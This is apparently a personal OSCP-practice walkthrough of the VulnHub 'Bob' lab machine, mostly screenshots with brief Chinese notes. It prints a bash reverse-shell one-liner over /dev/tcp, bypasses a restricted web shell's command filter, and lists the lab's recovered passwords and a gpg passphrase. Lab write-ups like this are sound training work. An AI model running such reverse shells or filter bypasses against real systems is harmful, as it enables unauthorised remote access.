vulnhub-17-bob - My-oscp-all-things

ipaddress:192.168.56.101 ### information_gathering open-port:80 25648 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1610530945259-3e14ff31-270d-49b9-9de6-07e500d5667e.png#align=left&display=inline&height=163&margin=%5Bobject%20Object%5D&name=image.png&originHeight=326&originWidth=1692&size=200644&status=done&style=none&width=846)..![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1610532030220-282e09e1-894a-42eb-87b0-33be99a26bf4.png#align=left&display=inline&height=251&margin=%5Bobject%20Object%5D&name=image.png&originHeight=502&originWidth=1540&size=340851&status=done&style=none&width=770) ### Establish a foothold 可知道部分命令被禁用，比如wget cat等，那么先读取本身的源码: tac dev_shell.php reverse-shell: bash -c 'exec bash -i &>/dev/tcp/192.168.56.3/9999 <&1' 查看源码果然 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1610532516290-264cdb64-ff37-4729-9b01-78a3417e7f7d.png#align=left&display=inline&height=293&margin=%5Bobject%20Object%5D&name=image.png&originHeight=586&originWidth=1978&size=222812&status=done&style=none&width=989) 查看可利用点： ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1610532879759-ae763f2a-4e58-4673-904e-49ec476bc273.png#align=left&display=inline&height=298&margin=%5Bobject%20Object%5D&name=image.png&originHeight=596&originWidth=510&size=119414&status=done&style=none&width=255) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1610533130473-3027a3f3-1bd2-499a-b62f-946b85b08e61.png#align=left&display=inline&height=157&margin=%5Bobject%20Object%5D&name=image.png&originHeight=314&originWidth=1468&size=144247&status=done&style=none&width=734) /usr/share/keyrings: ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1610533348284-28b3434e-5026-4eb5-af3d-8ebbbaad7e37.png#align=left&display=inline&height=647&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1294&originWidth=1550&size=606004&status=done&style=none&width=775) jc:Qwerty seb:T1tanium_Pa$word_Hack3rs_Fear_M3 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1610533462793-4299b88e-aa95-4761-a5e2-e3a80fecf0ba.png#align=left&display=inline&height=68&margin=%5Bobject%20Object%5D&name=image.png&originHeight=136&originWidth=1004&size=40581&status=done&style=none&width=502) elliot:theadminisdumb 一顿查找后并没有得到bob的密码 ### Privilege Escalation ``` gpg --batch --passphrase HARPOCRATES -d login.txt.gpg ``` 得到密码 bob:b0bcat_ okay: ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1610535238728-3a37279a-4e34-478d-860c-a6f7be951577.png#align=left&display=inline&height=378&margin=%5Bobject%20Object%5D&name=image.png&originHeight=756&originWidth=1328&size=237978&status=done&style=none&width=664)